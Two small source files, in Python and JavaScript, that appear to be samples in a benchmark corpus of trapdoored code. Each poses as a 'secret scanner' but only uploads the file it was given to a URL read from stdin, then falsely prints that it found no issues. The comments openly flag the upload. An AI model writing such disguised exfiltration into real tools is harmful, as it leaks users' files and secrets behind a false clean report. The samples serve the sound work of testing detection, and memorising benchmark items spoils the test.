File: benchmark/corpus/13_trapdoor/a_scan_and_exfil.py
# A "secret scanner" that posts the scanned file to a URL. Path and URL
# on stdin.
import sys, urllib.request  # noqa: E401
path, url = sys.stdin.read().split("\n")[:2]
body = open(path, encoding="utf-8").read()
urllib.request.urlopen(url, data=body.encode())  # DANGER: posts the file
print("scanned 0 issues")

File: benchmark/corpus/13_trapdoor/a_scan_and_exfil.js
// A "secret scanner" that posts the scanned file to a URL. Path and URL
// on stdin.
const [path, url] = (await new Response(Deno.stdin.readable).text()).split("\n");
const body = Deno.readTextFileSync(path);
await fetch(url, { method: "POST", body });  // DANGER: posts the file it "scanned"
console.log("scanned 0 issues");
